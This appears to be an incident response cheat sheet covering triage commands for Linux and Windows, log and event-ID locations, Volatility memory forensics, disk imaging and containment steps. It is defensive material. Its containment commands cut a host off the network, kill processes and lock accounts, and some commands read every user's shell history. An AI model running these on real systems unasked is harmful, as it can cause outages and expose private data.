1. Preparation → Policies, tools, training
2. Detection → Identify potential incident
3. Analysis → Confirm, scope, triage
4. Containment → Stop the spread
5. Eradication → Remove the threat
6. Recovery → Restore normal operations
7. Post-Incident → Lessons learned, reporting
# Who is logged in?
who / w / last
# What processes are running?
ps aux --sort=-%cpu | head -20
# Active network connections
netstat -antp
ss -antp
# Recent file modifications
find / -mtime -1 -type f 2>/dev/null | head -50
find /tmp /var/tmp /dev/shm -type f 2>/dev/null
# Scheduled jobs
crontab -l
ls -la /etc/cron*
cat /etc/crontab
# SUID binaries
find / -perm -4000 -type f 2>/dev/null
# Check bash history
cat ~/.bash_history
cat /home/*/.bash_history
# Running processes
Get-Process | Sort-Object CPU -Descending | Select-Object -First 20
# Network connections
Get-NetTCPConnection | Where-Object State -eq 'Established'
# Recent event logs (login failures)
Get-WinEvent -LogName Security -MaxEvents 50 | Where-Object {$_.Id -eq 4625}
# Recently modified files
Get-ChildItem -Path C:\ -Recurse -ErrorAction SilentlyContinue |
Where-Object {$_.LastWriteTime -gt (Get-Date).AddDays(-1)}
# Startup items
Get-CimInstance Win32_StartupCommand
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
# Scheduled tasks
Get-ScheduledTask | Where-Object {$_.State -ne 'Disabled'}
/var/log/auth.log # Authentication (Debian/Ubuntu)
/var/log/secure # Authentication (RHEL/CentOS)
/var/log/syslog # General system
/var/log/messages # General (RHEL)
/var/log/apache2/ # Apache web server
/var/log/nginx/ # Nginx web server
/var/log/cron # Cron jobs
/var/log/lastlog # Last logins
/home/*/.bash_history # User history
Security → 4624/4625 (logon), 4720 (user created)
System → 7045 (new service), 7040 (service changed)
Application → Application errors
PowerShell → Microsoft-Windows-PowerShell/Operational
Sysmon → Detailed process, network, file events
# Identify profile
volatility -f memory.dmp imageinfo
# Running processes
volatility -f memory.dmp --profile=Win7SP1x64 pslist
volatility -f memory.dmp --profile=Win7SP1x64 pstree
# Network connections
volatility -f memory.dmp --profile=Win7SP1x64 netscan
# Command history
volatility -f memory.dmp --profile=Win7SP1x64 cmdscan
volatility -f memory.dmp --profile=Win7SP1x64 consoles
# Dump process
volatility -f memory.dmp --profile=Win7SP1x64 procdump -p PID -D /output/
# Find injected code
volatility -f memory.dmp --profile=Win7SP1x64 malfind
# Create forensic image (Linux)
dd if=/dev/sda of=image.dd bs=4M status=progress
dcfldd if=/dev/sda of=image.dd hash=sha256 hashlog=hash.txt
# Mount read-only
mount -o ro,loop image.dd /mnt/evidence
# File carving
foremost -i image.dd -o /output/
photorec image.dd
# Hash verification
md5sum image.dd
sha256sum image.dd
# Isolate Linux host
iptables -I INPUT -j DROP
iptables -I OUTPUT -j DROP
iptables -I INPUT -s SIEM_IP -j ACCEPT # Keep SIEM connected
# Block malicious IP
iptables -A INPUT -s 1.2.3.4 -j DROP
iptables -A OUTPUT -d 1.2.3.4 -j DROP
# Kill malicious process
kill -9 PID
# Disable compromised user
passwd -l username
usermod -L username
| Type | Examples |
|---|
| File hashes | MD5, SHA1, SHA256 |
| IP addresses | C2 servers, attacker IPs |
| Domain names | Malicious domains |
| URLs | Malware download URLs |
| Email addresses | Phishing senders |
| Registry keys | Persistence locations |
| Mutexes | Malware mutex names |
| User agents | Malicious HTTP agents |
| Level | Description | Response Time |
|---|
| Critical | Active breach, data exfil | Immediate |
| High | Confirmed malware, compromised admin | < 1 hour |
| Medium | Suspicious activity, policy violation | < 4 hours |
| Low | Single failed login, minor anomaly | < 24 hours |
| Informational | Normal but notable event | Next business day |